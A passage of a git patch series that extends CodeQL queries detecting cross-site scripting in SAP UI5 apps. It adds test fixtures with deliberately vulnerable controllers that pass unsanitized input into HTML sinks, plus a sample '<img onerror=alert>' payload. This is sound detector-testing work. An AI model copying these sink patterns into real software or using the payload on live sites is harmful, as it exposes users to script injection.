+| webapp/controller/app.controller.js:9:17:9:27 | input: null | webapp/view/TestFragment.fragment.xml:5:1:7:28 | value={/input} |
+| webapp/controller/app.controller.js:9:17:9:27 | input: null | webapp/view/app.view.html:4:11:4:33 | data-content={/input} |
+| webapp/controller/app.controller.js:11:26:11:45 | new JSONModel(oData) | webapp/view/app.view.html:4:11:4:33 | data-content={/input} |
+| webapp/view/TestFragment.fragment.xml:5:1:7:28 | value={/input} | webapp/controller/app.controller.js:9:17:9:27 | input: null |
+| webapp/view/TestFragment.fragment.xml:5:1:7:28 | value={/input} | webapp/controller/app.controller.js:11:26:11:45 | new JSONModel(oData) |
+| webapp/view/app.view.html:4:11:4:33 | data-content={/input} | webapp/controller/app.controller.js:9:17:9:27 | input: null |
+#select
+| webapp/view/app.view.html:4:11:4:33 | data-content={/input} | webapp/view/TestFragment.fragment.xml:5:1:7:28 | value={/input} | webapp/view/app.view.html:4:11:4:33 | data-content={/input} | XSS vulnerability due to $@. | webapp/view/TestFragment.fragment.xml:5:1:7:28 | value={/input} | user-provided value |
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/TestFragment.fragment.xml b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/TestFragment.fragment.xml
index 311fb7c6f..7c84f45e2 100644
--- a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/TestFragment.fragment.xml
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/TestFragment.fragment.xml
@@ -4,6 +4,6 @@
 >
 <Input xmlns="sap.m"
           description="Enter Payload - Try: &lt;img src=x onerror=alert(&quot;XSS&quot;)&gt;"
-          value="{/input}">
+          value="{/input}"> <!--User input source sap.m.Input.value -->
      </Input>
 </core:FragmentDefinition>
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/app.view.html b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/app.view.html
index c835b8ef4..f23bf693f 100644
--- a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/app.view.html
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/app.view.html
@@ -1,6 +1,6 @@
 <template data-controller-name="codeql-sap-js.controller.app">
-     <div id="fragmentContainer"/></div>
+     <div id="fragmentContainer"></div>
      <div data-sap-ui-type="sap.ui.core.HTML" 
-          data-content="{/input}">
+          data-content="{/input}"> <!--XSS sink sap.ui.core.HTML.content -->
      </div>
 </template>
\ No newline at end of file

From 530df03d696292896faaf2ff9c332c63b2959116 Mon Sep 17 00:00:00 2001
From: Nathan Randall <data-douser@github.com>
Date: Tue, 30 Dec 2025 17:16:01 -0700
Subject: [PATCH 05/15] Improve UI5Xss detection for fragments_samples 1

---
 javascript/frameworks/ui5/ext/ui5.model.yml   |  4 +++
 .../javascript/frameworks/ui5/UI5.qll         | 33 +++++++++++++++----
 .../javascript/frameworks/ui5/UI5View.qll     | 16 +++++++--
 .../xss-fragment-static-byid/UI5Xss.expected  | 12 +++++++
 .../xss-fragment-static-byid/UI5Xss.qlref     |  1 +
 .../xss-fragment-static-byid/package.json     |  5 +++
 .../UI5Xss/xss-fragment-static-byid/ui5.yaml  |  7 ++++
 .../webapp/controller/Main.controller.js      | 27 +++++++++++++++
 .../webapp/index.html                         | 16 +++++++++
 .../xss-fragment-static-byid/webapp/index.js  | 10 ++++++
 .../webapp/manifest.json                      |  5 +++
 .../webapp/view/Main.view.html                |  6 ++++
 .../webapp/view/PayloadForm.fragment.xml      | 11 +++++++
 13 files changed, 145 insertions(+), 8 deletions(-)
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/UI5Xss.expected
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/UI5Xss.qlref
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/package.json
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/ui5.yaml
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/controller/Main.controller.js
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/index.html
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/index.js
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/manifest.json
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/view/Main.view.html
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/view/PayloadForm.fragment.xml

diff --git a/javascript/frameworks/ui5/ext/ui5.model.yml b/javascript/frameworks/ui5/ext/ui5.model.yml
index 19964a4a9..7f6802763 100644
--- a/javascript/frameworks/ui5/ext/ui5.model.yml
+++ b/javascript/frameworks/ui5/ext/ui5.model.yml
@@ -71,6 +71,10 @@ extensions:
       - ["UI5ClientStorage", "global", "Member[jQuery].Member[sap].Member[storage]"]
       - ["UI5ClientStorage", "sap/ui/core/util/File", ""]
       - ["UI5ClientStorage", "global", "Member[sap].Member[ui].Member[core].Member[util].Member[File]"]
+      # Fragment API - byId returns a Control (models static Fragment.byId() calls)
+      - ["Fragment", "Fragment", "Instance"]
+      - ["Fragment", "sap/ui/core/Fragment", ""]
+      - ["UI5InputControl", "Fragment", "Member[byId].ReturnValue"]
 
   - addsTo:
       pack: codeql/javascript-all
diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5.qll
index 9a110016c..08148c7b8 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5.qll
@@ -141,6 +141,16 @@ class SapUiCore extends MethodCallNode {
   SapUiCore() { this = globalVarRef("sap").getAPropertyRead("ui").getAMethodCall("getCore") }
 }
 
+/**
+ * A reference to the Fragment module (`sap/ui/core/Fragment`).
+ * Used for static methods like `Fragment.byId(viewId, controlId)`.
+ */
+class FragmentModule extends DataFlow::SourceNode {
+  FragmentModule() {
+    this = DataFlow::moduleImport("sap/ui/core/Fragment")
+  }
+}
+
 /**
  * A user-defined module through `sap.ui.define` or `jQuery.sap.declare`.
  */
@@ -334,14 +344,25 @@ class ControlReference extends Reference {
   string controlId;
 
   ControlReference() {
-    this.getArgument(0).getALocalSource().getStringValue() = controlId and
     (
-      exists(CustomController controller |
-        this = controller.getAViewReference().getAMemberCall("byId") or
-        this = controller.getAThisNode().getAMemberCall("byId")
+      // Standard byId patterns: this.byId("id"), this.getView().byId("id"), sap.ui.getCore().byId("id")
+      this.getArgument(0).getALocalSource().getStringValue() = controlId and
+      (
+        exists(CustomController controller |
+          this = controller.getAViewReference().getAMemberCall("byId") or
+          this = controller.getAThisNode().getAMemberCall("byId")
+        )
+        or
+        exists(SapUiCore sapUiCore | this = sapUiCore.getAMemberCall("byId"))
       )
-      or
-      exists(SapUiCore sapUiCore | this = sapUiCore.getAMemberCall("byId"))
+    )
+    or
+    // Fragment.byId(viewId, controlId) - static method with 2 arguments
+    (
+      this.getNumArgument() = 2 and
+      this.getArgument(1).getALocalSource().getStringValue() = controlId and
+      this.getMethodName() = "byId" and
+      exists(FragmentModule fragment | this = fragment.getAMemberCall("byId"))
     )
   }
 
diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
index 3abf3db77..483a30181 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
@@ -890,11 +890,23 @@ class UI5Control extends TUI5Control {
 
   /**
    * Gets a reference to this control. Currently supports only such references made through `byId`.
+   * Handles both:
+   * - `this.byId("controlId")` or `this.getView().byId("controlId")` - ID in argument 0
+   * - `Fragment.byId(viewId, "controlId")` - ID in argument 1
    */
   ControlReference getAReference() {
     result.getMethodName() = "byId" and
-    result.getArgument(0).getALocalSource().asExpr().(StringLiteral).getValue() =
-      this.getProperty("id").getValue()
+    (
+      // Standard byId: ID in first argument
+      result.getNumArgument() = 1 and
+      result.getArgument(0).getALocalSource().asExpr().(StringLiteral).getValue() =
+        this.getProperty("id").getValue()
+      or
+      // Fragment.byId: ID in second argument
+      result.getNumArgument() = 2 and
+      result.getArgument(1).getALocalSource().asExpr().(StringLiteral).getValue() =
+        this.getProperty("id").getValue()
+    )
   }
 
   /** Gets a property of this control having the name. */
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/UI5Xss.expected b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/UI5Xss.expected
new file mode 100644
index 000000000..bf9485fe6
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/UI5Xss.expected
@@ -0,0 +1,12 @@
+nodes
+| webapp/controller/Main.controller.js:20:17:20:29 | sAttackerData |
+| webapp/controller/Main.controller.js:20:33:20:97 | Fragmen ... Value() |
+| webapp/controller/Main.controller.js:24:34:24:69 | "<span> ... /span>" |
+| webapp/controller/Main.controller.js:24:45:24:57 | sAttackerData |
+| webapp/view/Main.view.html:4:10:4:34 | data-content={/payload} |
+edges
+| webapp/controller/Main.controller.js:20:17:20:29 | sAttackerData | webapp/controller/Main.controller.js:24:45:24:57 | sAttackerData |
+| webapp/controller/Main.controller.js:20:33:20:97 | Fragmen ... Value() | webapp/controller/Main.controller.js:20:17:20:29 | sAttackerData |
+| webapp/controller/Main.controller.js:24:45:24:57 | sAttackerData | webapp/controller/Main.controller.js:24:34:24:69 | "<span> ... /span>" |
+#select
+| webapp/controller/Main.controller.js:24:34:24:69 | "<span> ... /span>" | webapp/controller/Main.controller.js:20:33:20:97 | Fragmen ... Value() | webapp/controller/Main.controller.js:24:34:24:69 | "<span> ... /span>" | XSS vulnerability due to $@. | webapp/controller/Main.controller.js:20:33:20:97 | Fragmen ... Value() | user-provided value |
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/UI5Xss.qlref b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/UI5Xss.qlref
new file mode 100644
index 000000000..ce544f1d0
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/UI5Xss.qlref
@@ -0,0 +1 @@
+UI5Xss/UI5Xss.ql
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/package.json b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/package.json
new file mode 100644
index 000000000..f07d7baec
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/package.json
@@ -0,0 +1,5 @@
+{
+  "name": "ui5-xss-fragment-static-byid",
+  "version": "1.0.0",
+  "main": "index.js"
+}
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/ui5.yaml b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/ui5.yaml
new file mode 100644
index 000000000..2c7a22f1e
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/ui5.yaml
@@ -0,0 +1,7 @@
+specVersion: '3.0'
+metadata:
+  name: ui5-xss-fragment-static-byid
+type: application
+framework:
+  name: SAPUI5
+  version: "1.115.0"
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/controller/Main.controller.js b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/controller/Main.controller.js
new file mode 100644
index 000000000..fae5eeddd
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/controller/Main.controller.js
@@ -0,0 +1,27 @@
+sap.ui.define([
+    "sap/ui/core/mvc/Controller",
+    "sap/ui/core/Fragment"
+], function (Controller, Fragment) {
+    "use strict";
+    return Controller.extend("ui5-xss-fragment-static-byid.controller.Main", {
+        onInit: function () {
+            // Load fragment with view ID prefix
+            Fragment.load({
+                id: this.getView().getId(),
+                name: "ui5-xss-fragment-static-byid.view.PayloadForm",
+                controller: this
+            }).then(function (oFragment) {
+                this.byId("fragmentArea").addContent(oFragment);
+            }.bind(this));
+        },
+
+        onSubmitPayload: function () {
+            // XSS vulnerability: Fragment.byId() static method to access fragment controls
+            var sAttackerData = Fragment.byId(this.getView().getId(), "attackerInput").getValue();
+            var oHtmlSink = Fragment.byId(this.getView().getId(), "vulnerableOutput");
+            
+            // Sink: setContent with unsanitized user input
+            oHtmlSink.setContent("<span>" + sAttackerData + "</span>");
+        }
+    });
+});
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/index.html b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/index.html
new file mode 100644
index 000000000..4e9d8e5ea
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/index.html
@@ -0,0 +1,16 @@
+<!DOCTYPE html>
+<html>
+<head>
+    <meta charset="utf-8">
+    <title>UI5 XSS Fragment Static ById Test</title>
+    <script src="https://sdk.openui5.org/resources/sap-ui-core.js" 
+        data-sap-ui-libs="sap.m"
+        data-sap-ui-onInit="module:ui5-xss-fragment-static-byid/index" 
+        data-sap-ui-resourceroots='{
+            "ui5-xss-fragment-static-byid": "./"
+        }'>
+    </script>
+</head>
+<body class="sapUiBody" id="content">
+</body>
+</html>
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/index.js b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/index.js
new file mode 100644
index 000000000..da6657f38
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/index.js
@@ -0,0 +1,10 @@
+sap.ui.define([
+    "sap/ui/core/mvc/HTMLView"
+], function (HTMLView) {
+    "use strict";
+    HTMLView.create({
+        viewName: "ui5-xss-fragment-static-byid.view.Main"
+    }).then(function (oView) {
+        oView.placeAt("content");
+    });
+});
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/manifest.json b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/manifest.json
new file mode 100644
index 000000000..512c47013
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/manifest.json
@@ -0,0 +1,5 @@
+{
+    "sap.app": {
+        "id": "ui5-xss-fragment-static-byid"
+    }
+}
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/view/Main.view.html b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/view/Main.view.html
new file mode 100644
index 000000000..1ae6a5c77
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/view/Main.view.html
@@ -0,0 +1,6 @@
+<template data-controller-name="ui5-xss-fragment-static-byid.controller.Main">
+    <div id="fragmentArea"></div>
+    <div data-sap-ui-type="sap.ui.core.HTML" 
+         data-content="{/payload}">
+    </div>
+</template>
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/view/PayloadForm.fragment.xml b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/view/PayloadForm.fragment.xml
new file mode 100644
index 000000000..8d1866b16
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/view/PayloadForm.fragment.xml
@@ -0,0 +1,11 @@
+<core:FragmentDefinition
+	xmlns="sap.m"
+	xmlns:core="sap.ui.core"
+>
+<Input xmlns="sap.m"
+       id="attackerInput"
+       placeholder="Enter malicious payload">
+</Input>
+<Button text="Submit" press=".onSubmitPayload" />
+<core:HTML id="vulnerableOutput" />
+</core:FragmentDefinition>

From bb9452e8d7f5c00d52eb8d72b497eea7bddf2a2b Mon Sep 17 00:00:00 2001
From: Nathan Randall <data-douser@github.com>
Date: Tue, 30 Dec 2025 18:30:34 -0700
Subject: [PATCH 06/15] More potential detection improvements for UI5 XSS

---
 .../frameworks/ui5/RemoteFlowSources.qll      | 19 ++++++++++
 .../javascript/frameworks/ui5/UI5.qll         | 34 ++++++++----------
 .../frameworks/ui5/dataflow/FlowSteps.qll     | 31 ++++++++++++++++
 .../xss-urlparams-jsonmodel/UI5Xss.expected   | 36 +++++++++++++++++++
 .../xss-urlparams-jsonmodel/UI5Xss.qlref      |  1 +
 .../xss-urlparams-jsonmodel/package.json      |  4 +++
 .../UI5Xss/xss-urlparams-jsonmodel/ui5.yaml   |  4 +++
 .../webapp/controller/Display.controller.js   | 33 +++++++++++++++++
 .../webapp/fragments/Content.fragment.xml     |  9 +++++
 .../xss-urlparams-jsonmodel/webapp/index.html | 16 +++++++++
 .../xss-urlparams-jsonmodel/webapp/index.js   | 10 ++++++
 .../webapp/manifest.json                      |  5 +++
 .../webapp/view/Display.view.xml              |  9 +++++
 13 files changed, 192 insertions(+), 19 deletions(-)
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/UI5Xss.expected
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/UI5Xss.qlref
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/package.json
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/ui5.yaml
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/fragments/Content.fragment.xml
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/index.html
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/index.js
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/manifest.json
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/view/Display.view.xml

diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll
index b12dcf430..54ac667ed 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll
@@ -173,3 +173,22 @@ private class UI5ExtRemoteSource extends RemoteFlowSource {
     result = "Remote flow" // Don't discriminate between UI5-specific remote flows and vanilla ones
   }
 }
+
+/**
+ * URLSearchParams.get() and getAll() return URL query parameter values which are user-controlled.
+ * e.g., `new URLSearchParams(window.location.search).get("param")`
+ */
+private class UrlSearchParamsSource extends RemoteFlowSource {
+  UrlSearchParamsSource() {
+    exists(DataFlow::NewNode newCall, DataFlow::MethodCallNode getCall |
+      // Match: new URLSearchParams(...)
+      newCall.getCalleeName() = "URLSearchParams" and
+      // Match: .get() or .getAll() on the URLSearchParams instance
+      getCall.getMethodName() = ["get", "getAll"] and
+      newCall.flowsTo(getCall.getReceiver()) and
+      this = getCall
+    )
+  }
+
+  override string getSourceType() { result = "URL query parameter" }
+}
diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5.qll
index 08148c7b8..954e587b5 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5.qll
@@ -11,8 +11,10 @@ private module WebAppResourceRootJsonReader implements JsonParser::MakeJsonReade
   class JsonReader extends WebApp {
     string getJson() {
       // We match on the lowercase to cover all the possible variants of writing the attribute name.
+      // Support both "data-sap-ui-resourceroots" and "data-sap-ui-resource-roots" (with hyphen)
       exists(string resourceRootAttributeName |
-        resourceRootAttributeName.toLowerCase() = "data-sap-ui-resourceroots"
+        resourceRootAttributeName.toLowerCase() =
+          ["data-sap-ui-resourceroots", "data-sap-ui-resource-roots"]
       |
         result = this.getCoreScript().getAttributeByName(resourceRootAttributeName).getValue()
       )
@@ -146,9 +148,7 @@ class SapUiCore extends MethodCallNode {
  * Used for static methods like `Fragment.byId(viewId, controlId)`.
  */
 class FragmentModule extends DataFlow::SourceNode {
-  FragmentModule() {
-    this = DataFlow::moduleImport("sap/ui/core/Fragment")
-  }
+  FragmentModule() { this = DataFlow::moduleImport("sap/ui/core/Fragment") }
 }
 
 /**
@@ -344,26 +344,22 @@ class ControlReference extends Reference {
   string controlId;
 
   ControlReference() {
+    // Standard byId patterns: this.byId("id"), this.getView().byId("id"), sap.ui.getCore().byId("id")
+    this.getArgument(0).getALocalSource().getStringValue() = controlId and
     (
-      // Standard byId patterns: this.byId("id"), this.getView().byId("id"), sap.ui.getCore().byId("id")
-      this.getArgument(0).getALocalSource().getStringValue() = controlId and
-      (
-        exists(CustomController controller |
-          this = controller.getAViewReference().getAMemberCall("byId") or
-          this = controller.getAThisNode().getAMemberCall("byId")
-        )
-        or
-        exists(SapUiCore sapUiCore | this = sapUiCore.getAMemberCall("byId"))
+      exists(CustomController controller |
+        this = controller.getAViewReference().getAMemberCall("byId") or
+        this = controller.getAThisNode().getAMemberCall("byId")
       )
+      or
+      exists(SapUiCore sapUiCore | this = sapUiCore.getAMemberCall("byId"))
     )
     or
     // Fragment.byId(viewId, controlId) - static method with 2 arguments
-    (
-      this.getNumArgument() = 2 and
-      this.getArgument(1).getALocalSource().getStringValue() = controlId and
-      this.getMethodName() = "byId" and
-      exists(FragmentModule fragment | this = fragment.getAMemberCall("byId"))
-    )
+    this.getNumArgument() = 2 and
+    this.getArgument(1).getALocalSource().getStringValue() = controlId and
+    this.getMethodName() = "byId" and
+    exists(FragmentModule fragment | this = fragment.getAMemberCall("byId"))
   }
 
   CustomControl getDefinition() {
diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/dataflow/FlowSteps.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/dataflow/FlowSteps.qll
index a3463e079..2d2056177 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/dataflow/FlowSteps.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/dataflow/FlowSteps.qll
@@ -1,5 +1,36 @@
 import javascript
 import advanced_security.javascript.frameworks.ui5.UI5
+import advanced_security.javascript.frameworks.ui5.UI5View
+
+/**
+ * Step from a value assigned to a JSONModel property to the binding path that reads it.
+ * This enables tracking data flowing INTO a model constructor argument and OUT through XML bindings.
+ *
+ * e.g. Given:
+ * ```javascript
+ * var userInput = getUntrustedData();
+ * var oModel = new JSONModel({ payload: userInput });
+ * this.getView().setModel(oModel);
+ * ```
+ * and
+ * ```xml
+ * <core:HTML content="{/payload}" />
+ * ```
+ *
+ * Creates a flow step from `userInput` (the RHS of the property) to the binding path `{/payload}`.
+ */
+class JsonModelPropertyValueToBindingStep extends DataFlow::SharedFlowStep {
+  override predicate step(DataFlow::Node start, DataFlow::Node end) {
+    exists(UI5BindingPath bindingPath, DataFlow::PropWrite propWrite |
+      // The binding path resolves to a property write in a JSONModel
+      bindingPath.getNode() = propWrite and
+      // The start is the RHS value being assigned to that property
+      start = propWrite.getRhs() and
+      // The end is the binding path itself (as a node representing where data flows to)
+      end = propWrite
+    )
+  }
+}
 
 /**
  * Step from a part of internal model to a relevant control property.
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/UI5Xss.expected b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/UI5Xss.expected
new file mode 100644
index 000000000..a1d1cf638
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/UI5Xss.expected
@@ -0,0 +1,36 @@
+nodes
+| webapp/controller/Display.controller.js:10:17:10:25 | oUrlQuery |
+| webapp/controller/Display.controller.js:10:29:10:71 | new URL ... search) |
+| webapp/controller/Display.controller.js:10:49:10:70 | window. ... .search |
+| webapp/controller/Display.controller.js:11:17:11:30 | sRemotePayload |
+| webapp/controller/Display.controller.js:11:34:11:42 | oUrlQuery |
+| webapp/controller/Display.controller.js:11:34:11:57 | oUrlQue ... yload") |
+| webapp/controller/Display.controller.js:14:51:14:85 | "<div>" ... </div>" |
+| webapp/controller/Display.controller.js:14:61:14:74 | sRemotePayload |
+| webapp/controller/Display.controller.js:19:17:19:45 | remoteP ... Payload |
+| webapp/controller/Display.controller.js:19:32:19:45 | sRemotePayload |
+| webapp/fragments/Content.fragment.xml:7:9:7:49 | content={/remotePayload} |
+| webapp/view/Display.view.xml:6:13:6:53 | content={/remotePayload} |
+edges
+| webapp/controller/Display.controller.js:10:17:10:25 | oUrlQuery | webapp/controller/Display.controller.js:11:34:11:42 | oUrlQuery |
+| webapp/controller/Display.controller.js:10:29:10:71 | new URL ... search) | webapp/controller/Display.controller.js:10:17:10:25 | oUrlQuery |
+| webapp/controller/Display.controller.js:10:49:10:70 | window. ... .search | webapp/controller/Display.controller.js:10:29:10:71 | new URL ... search) |
+| webapp/controller/Display.controller.js:11:17:11:30 | sRemotePayload | webapp/controller/Display.controller.js:14:61:14:74 | sRemotePayload |
+| webapp/controller/Display.controller.js:11:17:11:30 | sRemotePayload | webapp/controller/Display.controller.js:19:32:19:45 | sRemotePayload |
+| webapp/controller/Display.controller.js:11:34:11:42 | oUrlQuery | webapp/controller/Display.controller.js:11:34:11:57 | oUrlQue ... yload") |
+| webapp/controller/Display.controller.js:11:34:11:57 | oUrlQue ... yload") | webapp/controller/Display.controller.js:11:17:11:30 | sRemotePayload |
+| webapp/controller/Display.controller.js:14:61:14:74 | sRemotePayload | webapp/controller/Display.controller.js:14:51:14:85 | "<div>" ... </div>" |
+| webapp/controller/Display.controller.js:18:30:20:14 | new JSO ...      }) | webapp/fragments/Content.fragment.xml:7:9:7:49 | content={/remotePayload} |
+| webapp/controller/Display.controller.js:18:30:20:14 | new JSO ...      }) | webapp/view/Display.view.xml:6:13:6:53 | content={/remotePayload} |
+| webapp/controller/Display.controller.js:19:17:19:45 | remoteP ... Payload | webapp/fragments/Content.fragment.xml:7:9:7:49 | content={/remotePayload} |
+| webapp/controller/Display.controller.js:19:17:19:45 | remoteP ... Payload | webapp/view/Display.view.xml:6:13:6:53 | content={/remotePayload} |
+| webapp/controller/Display.controller.js:19:32:19:45 | sRemotePayload | webapp/controller/Display.controller.js:19:17:19:45 | remoteP ... Payload |
+| webapp/fragments/Content.fragment.xml:7:9:7:49 | content={/remotePayload} | webapp/controller/Display.controller.js:19:17:19:45 | remoteP ... Payload |
+| webapp/view/Display.view.xml:6:13:6:53 | content={/remotePayload} | webapp/controller/Display.controller.js:19:17:19:45 | remoteP ... Payload |
+#select
+| webapp/controller/Display.controller.js:14:51:14:85 | "<div>" ... </div>" | webapp/controller/Display.controller.js:10:49:10:70 | window. ... .search | webapp/controller/Display.controller.js:14:51:14:85 | "<div>" ... </div>" | XSS vulnerability due to $@. | webapp/controller/Display.controller.js:10:49:10:70 | window. ... .search | user-provided value |
+| webapp/controller/Display.controller.js:14:51:14:85 | "<div>" ... </div>" | webapp/controller/Display.controller.js:11:34:11:57 | oUrlQue ... yload") | webapp/controller/Display.controller.js:14:51:14:85 | "<div>" ... </div>" | XSS vulnerability due to $@. | webapp/controller/Display.controller.js:11:34:11:57 | oUrlQue ... yload") | user-provided value |
+| webapp/fragments/Content.fragment.xml:7:9:7:49 | content={/remotePayload} | webapp/controller/Display.controller.js:10:49:10:70 | window. ... .search | webapp/fragments/Content.fragment.xml:7:9:7:49 | content={/remotePayload} | XSS vulnerability due to $@. | webapp/controller/Display.controller.js:10:49:10:70 | window. ... .search | user-provided value |
+| webapp/fragments/Content.fragment.xml:7:9:7:49 | content={/remotePayload} | webapp/controller/Display.controller.js:11:34:11:57 | oUrlQue ... yload") | webapp/fragments/Content.fragment.xml:7:9:7:49 | content={/remotePayload} | XSS vulnerability due to $@. | webapp/controller/Display.controller.js:11:34:11:57 | oUrlQue ... yload") | user-provided value |
+| webapp/view/Display.view.xml:6:13:6:53 | content={/remotePayload} | webapp/controller/Display.controller.js:10:49:10:70 | window. ... .search | webapp/view/Display.view.xml:6:13:6:53 | content={/remotePayload} | XSS vulnerability due to $@. | webapp/controller/Display.controller.js:10:49:10:70 | window. ... .search | user-provided value |
+| webapp/view/Display.view.xml:6:13:6:53 | content={/remotePayload} | webapp/controller/Display.controller.js:11:34:11:57 | oUrlQue ... yload") | webapp/view/Display.view.xml:6:13:6:53 | content={/remotePayload} | XSS vulnerability due to $@. | webapp/controller/Display.controller.js:11:34:11:57 | oUrlQue ... yload") | user-provided value |
